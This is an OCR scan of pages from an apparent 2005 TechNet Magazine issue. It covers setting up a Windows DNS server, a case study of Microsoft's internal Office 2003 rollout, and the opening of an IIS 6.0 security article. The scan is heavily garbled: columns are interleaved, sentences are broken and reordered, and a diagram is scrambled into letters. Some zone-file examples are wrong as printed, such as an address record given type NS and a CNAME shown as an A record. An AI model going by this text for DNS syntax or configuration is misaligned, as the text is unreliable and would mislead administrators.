DNS Server 


dows’ Components Wizard in Components 
| Networking Services | Detail | Subcompo- 


nents | Domain Name System. DNS Server | 
software is automatically installed as. 
part of Active Directory’ setup. This can — 
' with the elements of the Start Of Authority 
| (SOA) record. The SOA record has a num- 
| ber of fields that specify the domain name 
| for that zone file, the primary DNS server, 


also be done through the Configure Your 
Server wizard. 


Any time you register a new domain, you have 
to make sure that DNS servers on the Internet 
will know to ask your DNS server for 
information about your domain. 


Internet will know to ask my server for in- 
formation about example.com. Any time 
you register a new domain, or move a do- 
main’s name servers from one set of hosts 
to another, you have to work with your do- 
main name registrar to make sure that DNS 
servers on the Internet will know to ask 


your DNS server for information about — 


your domain. 
Whena DNS server learns a new piece of 


information as the result of a query for a | 


client machine, it will cache that informa- 
tion for a while—the actual cache time is 


specified by the server that provided the | 


authoritative information. During that 
time, client machines that ask for that par- 


84 TechNet Magazine 


Once the DNS server software has been 
properly installed, you can configure the 
DNS service on that host from within 
the DNS service console section of the 
Microsoft” Management Console (MMC) 
or using the dnscmd.exe command-line 
utility. To manage the DNS server, use the 
Connect to the DNS server dialog to con- 
nect to the DNS server in question, which 
is either the local machine or a remote ma- 
chine that you specify on your network. 

A caching-only server does not require 


any DNS zones to be configured or loaded — 


because it does not have any information 
that is served to the rest of the Internet. It is 


is up to date before deploying the server 
into production, however; this information, 


_ specific information. As of this writing, 


the authoritative location for the root 
hints file is ftp://ftp.rs.internic.net/domain/ 
named.cache. 


| Setting Up a DNS Zone 

ticular piece of information will be given — 
' ing the MMC to manage the DNS server, 
perform no further queries to find out if 
- ondary when prompted for the zone type. 
letes the cached entry when the time to live | 
_ primary server when prompted. Note that 
_ ifthe primary server is not set up to accept 
| zone transfers from this server or if the zone 
' transfer traffic (TCP port 53) is blocked by 
On Windows Server™ 2003, DNS server | 
installation is available through the Win- | 


To configure a secondary zone while us- 
select Action | New Zone, and select sec- 


Enter the zone name and IP address of the 


network filters or firewalls, your server may 
not be able to successfully provide authori- 
tative DNS service for the configured zone. 

Configuring a primary server is a bit 
more complicated. The New Zone Wizard 
will prompt you for the minimum infor- 


mation required for a zone file, beginning 


the responsible person, the TTL for records 
in that zone file, and instructions to sec- 


: ondary name servers for how often to check 


for new information and how long to keep 
serving the information if the primary be- 
comes unreachable. Figure 3 hasa rundown 
of the fields in an SOA record. 

The Primary server should be the server 
where you are configuring the zone. The 
Responsible Person should be the e-mail 
address of the person or group that admin- 
isters the domain. Traditionally, this has 
been the e-mail alias hostmaster, just as e- 
mail issues are traditionally directed to 
postmaster. Instead of an @ character, use a 
period, so that the e-mail address host- 


master@example.com would be entered as 


hostmaster.example.com. 
You may be asked for an initial serial 


~ number. This can be any integer, and while 
/ some DNS administrators prefer simple 
wise to check that the root server hints file © 


numbering of zone file versions, others pre- 


Figure 3 Fields in an SOA Record 


' SOA record. Every domain’s zone file must 
| have one and only one SOA record. 


SOA Field Description 

Name The name of the zone. 

TTL Time to Live. 

__Nameserver The primary or master DNS for this zone. __ ag 

Mail address E-mail of the person responsible for the zone. 

Serial Unsigned 32-bit value in range 1 to 2147483647. It must be incremented 
when changes are made to the zone file. fe 

Refresh Frequency in seconds that the record will be refreshed. Frequency that a 
secondary name server will poll the primary to check for changes. 

Retry Number of seconds between failed retries when updating secondary 
servers or trying to contact a primary server. Number of seconds after a 
failed refresh for a secondary server trying to contact a primary 

j : nameserver. Be S 

Expiry The time at which the zone becomes no longer authoritative and a new 
interrogation of the root servers is required. The time at which a 
secondary nameserver becomes no longer authoritative for the zone if the 

____ server has been unable to contact the primary. 

Minimum Caching duration. 


fer date-based numbering such as | 
2004062101 for the first file edit on June | 


integer, regardless. 
The Refresh Interval determines the in- 


data. A typical refresh interval is 15 min- 
utes (or 900 seconds). 
If a secondary name server was unsuc- 


transfer to get a new copy of a zone file — 
from the primary server, the Retry Interval _ 


for a zone indicates how long the second- 


ary server should wait to attempt another | 


zone transfer. This should be shorter than 


utes (600 seconds). 

Ifa secondary name server continues to 
be unable to communicate with the pri- 
mary server, it should eventually stop re- 


sponding because the zone file data it has is _ 
no longer reliable. This happens when the | 
Expire time interval has elapsed. This is 
typically 24 hours (86,400 seconds) but © 
may be set to be longer. If your primary | 
name server is going to be unavailable for — 
longer than the usual expire time, make sure 


to increase the expire time so that the sec- 


ondary servers will keep serving DNS data | 


in the interval. 


The TTL tells caching servers how long | 


www.technetmagazine.com 


most users, will be receiving the new infor- 


tative. If this was the zone file for the do- 


almost exclusively used for Internet ad- 
dresses. The “SOA” indicates that this is an 


The other requirement for a zone file to 


_ be functional is a resource record listing at 
| least one name server for the domain. In a 
| text zone file, this record would look like 
the following: 


example.com. IN NS nsl.example.com. 


_ This code defines nsl.example.com as a 

- name server (NS) for example.com. There 

' also must bea resource record that lists the 

_ address associated with the name nsl.ex- 

_ | ample.com. If the IP address of nsl.ex- 
' ample.com was 10.1.2.3, the A record 
- would look like this: 


nsl.example.com. IN NS 10.1.2.3. 


_ All authoritative name servers for a given 
/ domain, even if they are not themselves 
_ members of the domain, need to have NS 
to keep the information they receive as the — 
| result of client queries. The default for this 
21, 2004. The DNS server treats it as an is one hour (3600 seconds). If you make a 
| change to your DNS, you should expect that 
_ most DNS servers on the Internet, and thus 
terval in seconds for how often a secondary | 
name server will poll to see if there is new mation after the TTL interval has passed 
' and all caching servers should be reporting | 
_ the updated data. There is no reliable way 
| to issue a NOTIFY to caching servers to 
cessful in its attempt to poll the primary _ push changed data to the general Internet 
server to see if it should perform a zone | population. 

If you were to look at your DNS zone file | 
as a text file, the SOA record would look © 
something like Figure 4. 
' The @ character is a zone file variable | 
_ that stands in for the fully qualified domain 


the Refresh Interval; the default is 10 min- | name for which that the zone file is authori- 


records listed in the zone file. 

The rest of the DNS zone file is made up 
of resource records. There are several dif- 
ferent kinds of resource records, each of 


_ which defines a different attribute for a given 
‘ host. The most common is A, the address 
_ record which creates a link between a given 


hostname and an IP address. 
The MX record designates a Mail Ex- 


_ change host for a given domain. The re- 
' source record specifies the domain to which 
_ the MX record applies, the priority of this 


MX server, and the server to which mail 
should be sent. The priority allows you to 


' set up primary and backup mail servers, 


and the host with the lowest priority is con- 


| sidered the primary mail server. If the pri- 
' mary mail server is unavailable, the host 
_ sending mail should attempt to send the 
_ main name example.com, you could replace 
| it with example.com anywhere the @ ap- 
_ peared in the file. 
The“IN” indicates that these are Internet | 
| records. DNS was developed to work witha _ 
number of types of addresses, but is now » 


mail via the host with the next lowest prior- 


| ity,and soon. 


If you want to create a nickname for an 
already established machine, the CNAME 
resource record will allow you to do so. For 
example, you could define a name like 


Figure 4 DNS Zone as Text File 


@ IN SOA nsl.example.com. hostmaster.example.com. ( 
1 ; serial number 
3600 ; refresh [1h] 
600 ; retry [10m] 
86400 ; expire [1d] 
3600 ) ; min TTL [1h] 


Winter 2005 85 


fas.example.edu to point to the longer name 


faculty-of-arts.example.edu. like so: 
faculty-of-arts.example.edu. IN A 10.1.1.2 
fas.example.edu. IN A faculty-of- 
arts.example.edu. 


Another common use of CNAME 


records is to create multiple names point- 


_ ing to a single multi-purpose host, like — 
' master to make one change to the record of 


mail.example.com and ftp.example.com. 
In production, one common use of 


CNAME records is to make it easier to | 


maintain a set of hostnames that all lead to 
a single machine. This allows the host- 


the host that the CNAMEs lead to and have 


zone files are more compli- 


DNS servers that are not authoritative for any © 
domain but which provide DNS service to client | 
machines are called caching-only servers. They © 
are the simplest type of DNS servers to config- _ 
ure. The DNS servers that store the authorita- 
tive information about one or more domains in | 


this change the records for all of the 


the DNS server is first set up and incremented auto- 

matically when changes occur or the domain adminis- 

trator may be responsible for updating the number 

manually. If the number on the primary server is nu- 

merically larger, the secondary server will initiate a 

zone transfer, and download the entire zone file from 
the primary server (see Figure A). 


cated to configure. These 
servers are broken down into 
two groups: primary servers 
and secondary servers. 

You can set up the server 
to be either a primary or sec- 
ondary server for a given 
zone. The primary server is 
the authoritative source for 
the information in a zone; any 
changes made to a zone must 
be made on the primary 
server. A zone must have a 
primary server. 

A secondary server is listed 
as being authoritative for a 
given zone, but whereas the 
primary server has the zone 
file stored locally, the second- 
ary server pulls the zone in- 
formation from the primary 
server upon startup and 
whenever the information on 
the primary server has 
changed. Thus the keeper of 
the changes is the primary 
server. A zone may have from 


Y) 
pa 
oO 
> 
— 
oO 
Y) 
a0 
= 
ie 
O 
© 
>) 
> 
< 
© 
12 
exe 
O 
O 
Oo 
Y) 
> 
— 
qe) 
= 
= 
O_ 


Start Refresh 
timer. 


Has the 
Refresh timer 
for this zone 

expired? 


Send a query 
to the primary 
DNS server for 

this zone. 


Is the 
serial number 
from the primary 
server larger than 
the stored serial 
number? 


Sansa Upaase 


ated 
copy of zone from 


Under most versions of DNS 
server software, if the new serial 
number is numerically smaller than 
the old serial number—through in- 
teger overflow or a change in serial 
number format, for instance—the 
secondary server will fail to load 
the new zone file until the local 
cache, including secondary DNS 
files, is cleared. 

The NOTIFY operation lets sec- 
ondary servers learn of changes au- 
tomatically. If a primary server is 
configured with a NOTIFY list of 
secondary DNS servers for a given 
zone file, it will then alert those 
secondary servers when there have 
been changes made to the zone 
file. The secondary servers will ac- 
knowledge the NOTIFY request and 
poll the primary server as it does 
when the TTL expires. 

The difference between a second- 
ary server and a caching server is 
that a caching server only queries 
for the specific records it needs and 
will discard those records when their 


primary ser r via 


one to several secondary serv- 
ers. Hosts on the Internet per- 


forming name lookup for a zone will generally | 
try the first DNS server listed for a given zone. | 
Most DNS server software will round-robin to | 


rotate through a given set of records as a way to 
achieve some primitive load balancing. 


the secondary server checks for new informa- 


number it has stored. Depending on the server 
software, the serial number may be chosen when 


86 TechNet Magazine 


Figure A Primary/Secondary Servers 


TTL expires. A secondary server will 
download the zone files of the zones 
for which it is authoritative. A secondary server will 
download the entire zone rather than just the specific 
records a user requests, and it will keep the zone file 


_ information until it has been unable to reach the 
| primary server for some long period of time (often a 
When the Refresh timer for a zone expires, | 
_ the Start Of Authority section of the zone file on the 
tion by comparing the serial number of the — 
current zone on the primary server to the serial | 


week or more). These time intervals are configured in 


primary server. 
Almost all primary and secondary DNS servers also 


_ provide a caching service for queries about records 
_ for which they are not authoritative. 


hostnames. A limitation of a CNAME | 
record is that it should not be used for a | 
record that already has other entries. If you 
want your Web server, www.example.com, — 
to point to the same machine as exam- | 
ple.com, you cannot have a record that | 
points example.com to www.example.com, | 
since example.com already has other re- | 
source records such as NS and SOA records. 
One way to think about why this won't work | 
is to consider that there is no way for DNS | 
to knowif you mean the host example.com | 


or everything ending in example.com. 


So while this is okay, 

www.example.com. IN CNAME example.com. 
this is not: 

example.com. IN CNAME www.example.com. 


If you do want everything ending in a | 
given domain to go to a specific host, you _ 
can use a wildcard record: a CNAME of * | 
within that domain that points to the host 


| The Other Side of DNS 


to which all names that are not already de- 


fined should point. With the following 
record in place, any hostname that is not _ 
explicitly defined will be treated as a — 


CNAME for wildhost.example.com: 


* example.com. IN CNAME 
wildhost.example.com. 


While this can be convenient, it does run — 
the risk of making hostnames like example- 
is-a-bunch-of-idiots.example.com returna _ 


valid response. 


Inall the examples so far, we’ve seen fully | 
qualified domain names. If a resource | 
record does not usea FQDN, DNSassumes | 


that the zone name should be appended. 

So in this case, 
foo.example.com. 

is equivalent to: 
foo IN A 10.128.5.22 


IN A 10.128.5.22 


If you leave off the trailing period in a | 


www.technetmagazine.com 


Where to Learn More 


While this article has provided information about DNS in general as well as 
the Windows DNS server, there are many useful Web resources with informa- 
tion about DNS. The MSDN list of DNS standards documents ts available at 
msdn.microsoft.com/library/en-us/dns/dns/dns_ standards documents.asp. Information on DNS 
in Windows 2000 is available at www.microsoft.com/Windows2000/technologies/communica- 
tions/dns. Information on the Windows Server 2003 implementation of DNS 
can be found at www.microsoft.com/resources/documentation/WindowsServ/2003/standard/ 


proddocs/en-us/sag DNS imp. PlanningNode.asp. 


For more generic information about DNS, such as DNS standards and 
software as well as other implementations of DNS server software, the DNS 
Resources Directory is available at www.dns.net/dnsrd. 


| FQDN, DNS will still assume that the zone | 
_ name should be appended. So that 


foo.example.com IN A 10.128.5.22 


as 10.128.5.22. 


The Domain Name System has two ma- 


jor branches. The part we've discussed so _ 
far creates a mapping of names to IP ad- 
dresses; the other creates a mapping of IP _ 
_ data locally. 


If you have a small 
Internet presence, 
it’s possible that your 
ISP may maintain the 
reverse DNS records. 


_ addresses to names. The latter is done by — 
' means of PTR (or Pointer) records. The 
~ domain in-addr.arpa holds all IP address 
| to name mappings. 

The PTR record links an IP address with | 
aname, and it lists the four octets of the IP _ 


address in reverse and appends the PTR 


domain of .IN-ADDR.ARPA. A PTR 
- record linking 10.128.5.22 to foo.ex- 
will create a resource record defining the IP 
address of foo.example.com.example.com 


ample.com would be: 


22.5.128.10.IN-ADDR.ARPA. 
foo.example.com. 


IN PTR 


If you have a small Internet presence, it’s 


possible that your ISP may maintain the 


reverse DNS records. As long as the reverse 
zone is delegated to you, you can create a 
reverse zone, as PTR zones are called, and 
then manage your own IP address-to-name 


Some hosts, particularly hosts that re- 


ceive mail, will check that a forward and 
_ reverse lookup for a given host have match- 
| ing records. If they do not match, the host 
_ will refuse to accept mail. It's worthwhile to 
_ verify that your mail servers have matching 
_ forward and reverse DNS information. 


DNS problems can be difficult to 
troubleshoot. One way to approach trouble- 
shooting is to perform lookups against a 
remote DNS server to make sure that ma- 


chines out on the Internet are looking to 


the right servers and getting the correct in- 
formation for your DNS zones. ® 


Winter 2005 87 


A 200,000+ Desktop Deployment 


STUDY 


_ food? The feedback that the product de- 
velopment groups glean from this process 


D eploying a major software application 


such as Microsoft’ Office 2003 or | 


Microsoft Windows’ XP Professional 
throughout a global enterprise can be a 
challenge for any IT organization. And just 
because Microsoft wrote the software 
doesn’t mean internal deployment is a 


simple process. If you ever wanted to look | 
inside Microsoft to catch a glimpse of how | 


the Microsoft IT team does deployment, 
get out your notebook because I’m going to 
run you through the steps they took to de- 
ploy Office 2003 in several iterations, from 
the first beta release to the final version. 


The Beta Deployment Cycle 

The Microsoft approach to the devel- 
opment of reliable software includes the 
wide-scale deployment of pre-release ap- 
plications to employee's computers—a 
practice known as “eating your own dog 


88 TechNet Magazine 


is invaluable and helps ensure quality in the 


development phase. On the installation and 
deployment end, the dog food process pro- 
vides Microsoft IT teams with valuable 


quality control experience. 


IT/LOB Application Testing 


There is always a potential for compat- ! 
' ibility problems when deploying any new 


version of software, software update, or ser- 
vice pack. To minimize this risk, Microsoft 
IT maintains a central data repository con- 


_ taining information on every known line- 


of-business (LOB) application. The 


| database is accessible via an intranet por- 


tal, so interested parties can easily generate 
reports detailing which technologies an ap- 


plication has been built with or has — 


dependencies on. 


For example, when planning the deploy- 
ment of a Windows XP Professional Ser- 


vice Pack, Microsoft IT was able to report 
any applications that have dependencies on 


Effective support is 
especially challenging 
during a dog food 
period because 
documentation is 
often not complete. 


Microsoft Internet Explorer, ActiveX” con- 


- trols, firewalls, and so on. Sucha report can 


contain other pertinent information in- 
cluding the e-mail address of the app owner 
or person responsible for testing it, as well 
as the number of clients using it. 

At each dog food deployment milestone 


| (Beta 1, Beta 2, and so on), applications are 


tested for compatibility and any problems 


' are identified and corrected before the final 


release. For example, when Microsoft tested 
Office 2003, they discovered that there were 


: anumber of apps relying on the Office XP 


Web Components that would require up- 
dating to the newer version. 


' Feature Scenarios 


The Microsoft IT team runs a variety of 
scenarios throughout the testing process. 


Steve Reay is a Program Manager within the Microsoft IT 
organization and has worked in a variety of support and 
deployment roles within IT at Microsoft since he joined 10 
years ago. 


These scenarios simulate various depen- | 
dencies in which new features require other _ = ein ee Seen 
applications to help them run. For example, — 
the Cached Exchange Mode functionality © 
of Microsoft Outlook® 2003 requires Mi- 
crosoft Exchange 2003 to be running for — 
the full functionality to be available. And | 
because an Exchange Server migration and 
consolidation project and some user train- 
ing were occurring at the same time as the | 
Office 2003 deployment, the timing of the | 


upgrades had to be planned carefully. 


For more information on the Exchange 
server consolidation project, see the article _ 
Deploying a Worldwide Site Consolidation | 


| Figure 1 Custom Maintenance Wizard 
Solution for Exchange Server 2003 at | 3 wi 


www.microsoft.com/services/microsoftservices/ 
pdo_server.mspx. 


Deployment Customizations 


In order to validate certain feature sce- 


narios, the Microsoft IT team must deploy 
custom Office 2003 settings. For example, 


the team deployed all Outlook 2003 e-mail _ 
clients with the Cached Exchange Mode | 


turned on by default. 
Because much more software deploy- 


Even at Microsoft, users rarely 
change the way they work with 
_ applications after the installation 
_of new software. When new tech-- 
nology is deployed, one of the 
biggest challenges is teaching 
‘employees how to take advan- 
tage of new features and im- 
“provements. To address this | 
problem, Microsoft IT selects a 
limited number of new features 
and improvements, creates tar- 
-geted education materials, and. 
delivers them through several 
_channels—brown-bag lunchtime 
presentations, webcasts, and in- 
tranet Web site documentation. 
_Aneffective employee education . 
vehicle has been ’ ‘Quick Tip” e- 
mails, which list three new fea- 
tures per e-mail and provide | 
_ enough instruction to get started 
with the feature. 


$= Microsoft Office 2003 Custom Maintenance Wizard 


Make changes to any Office user setting on the computer where this CMW file is deployed, These settings are applied to all users on the 


computer and overwrite existing settings. Only configured settings are applied. 


EQ Microsoft Office Access 20034 
ea Microsoft Office Excel 2003 
+) (J Microsoft Office FrontPage 2003 
® (3 Microsoft Office Outlook 2003 
2) Microsoft Office PowerPoint 2003 
CQ Microsoft Office Word 2003 
(+ (2) Microsoft Office 2003 (machine) 
‘| (Q] Microsoft Office 2003 (user) 

J Microsoft Clip Organizer 
© 2) Microsoft Office InfoPath 2003 
© ©) Microsoft Office Publisher 2003 
i (23) Microsoft Office OneNote 2003 


Etec | Options... 


C2lnew File Links 
miscellaneous 


‘ Show all settings © Show configured settings only 


_ Delivery 
_ After the installation was customizedand | 
_ tested, Microsoft IT deployed the Office | 
| 2003 package using Microsoft Systems | 
_ Management Server (SMS) 2003. SMS pro- 
_ vides a complete solution that includes rep- 
- lication of the installation package, delivery 
_ to the client desktop, and reporting to con- 
_ firm the success of the deployment. SMS | 
_ helped make the installation as seamless as _ 
_ possible. SMS can often install and update — 
applications without the employee even be- _ 
_ ing present at their computer. Users really — 
_ appreciate that! 


(2) customizable error messages 


Cancel | <Back Einish | 


_ ment happens at Microsoft than ina typi- | Phased Deployment 
_ cal organization, creating a painless end- 
_ user experience is paramount for the © 
_ Microsoft IT team. | 
For this reason, the IT team doesasmuch | 
_ of the work for the user as possible. Prod- 
_ uct keysare entered automatically, End User 
License Agreements are accepted, and the _ 
installation user interface is reduced to | 
_ only a progress bar and completion mes- 
_ sage, all to make the process less taxing on 
the end users. 
To build these customized installations, — 
' the Microsoft IT team uses the publicly © 
available customization tools found at the 
Microsoft Office Web site at www.microsoft.com/ 
 office/ork/2003. The Custom Maintenance | 
_ Wizard, which allows many aspects of the _ 
_ application to be tuned to any environment, 
_ was the primary customization tool used | 
_ for the Office 2003 deployment. Figure 1 
' shows the intuitive interface of the Custom | 
' Maintenance Wizard. 


The Microsoft IT team routinely takes a 
phased approach to software deployment, 


' focusing at first on a small group of clients 


so that the IT team can refine the deploy- 
ment process and gain key feedback regard- 
ing support questions, application issues, 
and installation experience. The phased ap- 
proach results in a more efficient and 
streamlined deployment to the larger group 
later on as the most common client ques- 


' tions and problems have already been ad- 


dressed in the smaller trial groups. 
Effective support is especially challeng- 
ing during a dog food period because the 
app support documentation is often not 
complete. Phased deployment is important 
as it gives the support team time to build 


_ fixes and workarounds for the top support 


call issues before the app is widely deployed. 


Reporting 


No deployment is complete without the 


_ ability to report on its success. Reporting 
"speed is critical for Microsoft IT, as a given 


beta deployment may have a goal that must 
be met in a short time. For example, the 
Microsoft Office 2003 Beta 2 deployment 
goal was to reach 30,000 desktops in eight 


_ weeks, and effective reporting helped to 


meet and exceed this objective. The appli- 


~ cation was deployed to 7,000 more desk- 


tops than targeted in those weeks. 

SMS 2003 provides reporting that al- 
lowed the Microsoft IT team to quickly de- 
termine which computers received the 
installation package, which ones ran it suc- 


- cessfully,and which were not successful. @ 


Winter 2005 89 


For qualified subscribers in the 


_ ANATOMY 
OFA 


HACK 


E 
ir als: 
wwwtechnetmagazine! “© PREMIERE ISSUE 


r ¢ 4 (i tT) V 


wd 


youl fac, UNIX, And 
Detect And Prev : ctive Directory 
Session Hijac : ee: 


Catch Hackel : ix Resources 
In The Act I For IT Pros 


How To Respond: ith Smart C 

A Network Breach wes pede cards 
Office-Exchange- SQL Server 
lS 6.0 Windows XP SP2 


Microsoft TechNet 


TechNet Magazine, a joint publication of Microsoft Corporation and 
CMP Media LLC, is offering a special edition to qualified IT professionals. 


TechNet Magazine will provide in-depth, hands-on technical information that IT 
professionals can use in their daily work, covering the most current solutions for 
managing IIS, Exchange Server, Active Directory, Office, Windows Server, and much more. 


Brett Hill 


IS 5.0 administrators are familiar with 
the important security-related tasks re- 
quired to harden and maintain a secure Web 


services environment. The many new fea- | 
tures and capabilities of IIS 6.0, available | 


with every version of Windows Server™ 


2003, renders the previous version obso- — 
lete. If you're like me, when I first opened _ 
the IIS 6.0 user interface, I was surprised at 


how familiar it seemed. If you can config- 


ure security for an IIS 5.0 server, youre well 
on your way to managing an IS 6.0 server. | 


Nevertheless, experienced IIS administra- 


tors are sometimes caught by surprise try- 


ing to get their IIS 5.0 applications to work 
on IIS 6.0, prevented from doing so in cer- 
tain scenarios because of the new security 
defaults and design. 

With just a little research, you can avoid 


the bumps in the road that you would oth- | 


erwise most certainly encounter. In this ar- 
ticle, Pll review a few of the most important 
new items to add to your “must do’ list, and 
[ll highlight how you can improve security 
in ways not possible before. 


Identify Entries for Web 
Service Extensions 

The troubleshooting question IIS ad- 
ministrators ask most frequently when they 
first deploy IIS 6.0 involves a new feature 
that is a bit surprising when first encoun- 
tered. In the IIS Manager console, a new 


Brett Hill is an IIS MVP and runs IISTraining.com, IISFAQ.com, 
and IlSAnswers.com. He is a regular speaker at TechEd and 
Windows Connections conferences, and is considered one of 
the nation’s leading authorities on IIS. You can reach Brett at 
www. iistraining.com. 


www.technetmagazine.com 


node has been added called Web Service | 

Extensions (WSE), shown in Figure 1. 
Dontlet the innocent sound of WSE lead 

you to believe that you can deal with this 


SERVING tHe 


Essential Security Administration for IIS 6.0 


WEB 


executables and libraries are allowed to run 
on the Web server, and by default, nothing 
is allowed to run. (No, I’m not kidding.) 
Even if you set NTFS permissions to give 


' everyone full control, unless you specifi- 


if you can configure 
security for an IIS 5.0 
server, you’re well on 
your way to managing 
an liS 6.0 server. 


after you get your application up and run- 
ning. WSE has nothing to do with XML | 
Web Services or FrontPage” Server Exten- | 
sions. Rather, these settings control which 


© File Action View Window Help 


BLADE-DEFAULT (local come § 
“> Default SMTP Virtual Serv: 
&-_3 Application Pools 

id Web Sites 

_J Web Service Extensions 


Prohibit 


Properties 


IB Add a new Web service 
extension... 


Dd Allow all Web service 
extensions for_a specific 
application... 


Prohibit all Web service 
extensions 


cally allow an extension in Web Service Ex- 
tensions, IIS will not run it. This is a perfect 
example of what Microsoft means by “se- 
cure by default” 

This does not mean you will need to 
identify all scripts by full path and filename, 
but it does mean identifying all script en- 
gines. For example, in order to host 
ASP.NET applications, you must specifi- 
cally allow ASP.NET as provided by 
aspnet_isapi.dll (which can be enabled dur- 
ing installation or with the Manage Your 


Ry Internet Inforrnation Services 4 § Web Service Extensions 


: | Web Service Extension —_~ Status | 


a{@ All Unknown ISAPI Extensions Prohibited 
Y All Unknown CGI Extensions Prohibited 


Active Server Pages Prohibited 
a) Internet Data Connector Prohibited 
la] Server Side Includes Prohibited 
[2] WebDAV Prohibited 


Figure 1 IIS Manager 


Winter 2005 91 


Figure 2 Unique Extensions : 


Extension Query 
Jpg 1306544 
gif 790245 
htm 407679 
asp 222184 
-png 176696 
GIF 32983 
ico 23439 
. txt 19564 
11 4502 
-eXe 2379 

. php 2233 
«htm 2065 


“allow” rule for all DLL and executable files 
you invoke from a URL or redirect. 

If you absolutely, positively have to get 
running today, you can set Web Service Ex- 
tensions to not enforce any restrictions by 
enabling Allow All Unknown ISAPI or Al- 
low All Unknown CGI, but in doing so you 
give up a great defensive security feature 
that can help protect you against current 
and future exploits. The following is a tip 


on how to quickly identify all the required 


entries you will need. 


As part of the IIS 6.0 Resource Kit (sup- 


port.microsoft.com/?id=840671) you'll finda very 
cool utility called Log Parser 2.1. This tool 


allows you to query many log files, text files, 
and other items too numerous to mention | 


using a SQL query (Microsoft” SQL Server™ 


is not required). Copy Logparser.exe and | 
the script Extensions.sq] into the folder that | 


contains the log files you want to analyze, 


and then run the following query from a | 


Identify Required Entries 


command line in the log folder: 

Log parser file: extensions.qry 
This will create a unique list of all the file 
extensions that are involved in your real- 
world IIS server. On my machine, this re- 
sults in the output shown in Figure 2. 

With this info in hand, you can run an- 
other query on each executable file exten- 


sion to identify URL paths to all your | 


executables. To do this using Log Parser 2.1 
type the following query (or modify exten- 
sions.qry) into Notepad and save it as ex- 
tensions-uri.qry. This query looks more 
involved than it is, and with Log Parser 2.2 


simplified. In the meantime, the following 
query should work: 


92 TechNet Magazine 


SELECT Distinct cs-uri-stem, 
SUBSTR(cs-uri-stem, 
LAST_INDEX_OF(cs-uri-stem,'."), 
STRLEN(cs-uri-stem) 

) AS Extension 

FROM ex*.log WHERE Extension = '.d11' 
and cs-method='GET' and sc-status=200 

ORDER BY cs-uri-stem 


' With this query in hand, you can run it 


with the following command: 


Logparser file:extensions-uri.qry 


| After the query has finished executing, 
: youll see output that looks something like 


Figure 3. 
With just a few tweaks, you could use 


' these same queries to scan your entire Web 
Server Wizard). You also need to create an | 
' and youd like to learn more about the Log 


server farm. If you're a TechNet subscriber 


Parser tool, you'll find a white paper intro- 


ducing the tool in the April 2004 edition of © 


the TechNet subscription available on CD, 
along with a beta version of Log Parser 2.2 


on the Downloads CD. 

Figure 3 Executable Paths 
cs-uri-stem Extension 
/_vti_bin/SHTML.d11 di] 
/_vti_bin/_vti_adm/admin.d11 .d1] 
/_vti_bin/_vti_adm/fpadmd11.d11 qd] 
/_vti_bin/_vti_aut/author.d11 d11 
/_vti_bin/shtml.d11 11 


Now you know how to utilize WSE to get 
your IIS 6.0 applications online and more 
secure. Adding entries to the list and allow- 
ing new applications to run is a simple pro- 
cess using the IIS Manager or using the 
iisext.vbs script. 


for MIMEMaps 

HS 6.0 will not deliver content for which 
there is no MIMEMap entry. This is a new 
security feature that prevents IIS 6.0 from 


| delivering content for any file type on the 
| server, regardless of whether it is a known 


or unknown file type. For example, if you 


place new scripts on the server for a file | 


type that is undefined, IIS 5.0 would de- 
liver the content as text until the applica- 
tion mapping has been installed. This can 
also occur if a script engine is uninstalled 


. while at the same time leaving the related 
(due for release Fall 2004), it can be greatly | 


scripts on the server. 
You can view the list of defined MIME 
types by opening the IIS Manager, right- 


clicking on the computer icon, selecting 


| Properties, and clicking the MIME Types 
' Button (see Figure 4). 


Reviewing the list of file extensions you 
generated with the Log Parser tool from 
your existing IIS log files, if you find any 
MIME types that are legitimately required, 
you will need to add them to the MIME 
types list in IIS 6.0. While you are there, 
because you also know from the Log Parser 
list what isi’t in use, you can safely remove 
any of those MIME types that are defined, 
but that aren't being used (and most likely 
there will be many). Of course, it’s always a 
good idea to make a complete backup first 
in the unlikely event that you delete some- 
thing you need. 


Undefined MIME Types/ 
Web Service Extensions 

Let's say that one day after installing your 
IS 6.0 servers, a user contacts you and says 
they are getting a 404—File Not Found 
message. You verify that the file is on the IIS 
server and that the user has rights to access 
the file. You try to request the file, and you 
get the same result—file not found. You re- 
start the server to clear any problems, but it 
has no effect. 

This exact scenario occurs when you try 
to access a file that is an undefined MIME 
type or an extension that is requested but 
not defined in the WSE. In both cases, the 
requested file can exist on the server with 
proper permissions, but IS will return to 


| the usera simple and intentionally mislead- 


ing 404—File Not Found message. 


Registered MIME types (file extensions): 


323 textyh323 a 
aat application/octet-strearn 

aca application/octet-strearn 

.BCK application/internet-property-stre 
wafm application/octet-strearn 

al application /postscr ipt 

aif audioh-aiff 

waifc audio/aiff 

aiff audio/aiff 


vart irmage/x-jg 

vasd application/octet-stream 

vast video/x-ms-asf 

asi application/octet-steam 

asin text/plain thd 

MIME, type detalls sires aoeee ary cee eee 1 
| | 
| Extension: | 


| MIME type: 


OK Cancel 


Figure 4 MIME Types 


Logging Properties 
General Advanced 


Extended lagging options: 


MDate (date) 
MiTime (tirne ) 
Extended properties 
» Client IP Address (c-ip ) 
» @ User Narme (cs-username ) 
» [Service Name (s-sitename ) 
Dj Server Name ($-computernarne ) 
Server IP Address (s-ip ) 
i Server Port (s-port ) 
» [Method (cs-method ) 
MURI Stern (cs-uri-stem } 
© WIURI Query (cs-uri-query ) 
> ¥j Protocol Status (sc-status ) 
meee otocol Substatus: (sc-substatus 
i Wind? Status ( sc-win32-status ) 
M1 Bytes Sent (sc-bvtes } xl 


) 


Help 


Figure 5 Logging Properties 
to determine ifa 404— File Not Found mes- 


missing, or is one of these two special cases? 


log file on ITS 6.0 has a new field called the 


sub-status code that can specifically iden- 
tify when a 404 error occurs because of a 
MIME type or WSE. To use the field, sim- 
ply enable it in the log file Advanced prop- 
erties page (see Figure 5). Right-click ona | 
~ tions in order to once again get your appli- 
ties, click on the Properties Button on the — 
Web Site tab, then click on the Advanced | 
tab. Note that this field is only available count is given the Deny Write permission. 
when your log files are setto W3C Extended — 


Web site in the IIS Manager, select Proper- 


Log File Format. The sidebar entitled “Sub- 
Status Error Codes” lists the error codes 
that may get logged. Inspecting the con- 


lem in our example. 


An Entirely New Log File 


Since were talking about log files, for se- 
curity and troubleshooting purposes you | 
should know about an entirely new log file 
available from IIS 6.0. A brief explanation 


helps to explain why this log is necessary. 


IIS 6.0 contains a kernel-mode HTTP | 
parsing engine and cache called http.sys. 
When the http.sys listener encounters an — 
error, it requires a place to record it, and so 
its developers invented the httperr(x).log © 
files which you can find in \system32\log- 
files\httperr. Httperr logs have an entry | 


www.technetmagazine.com 


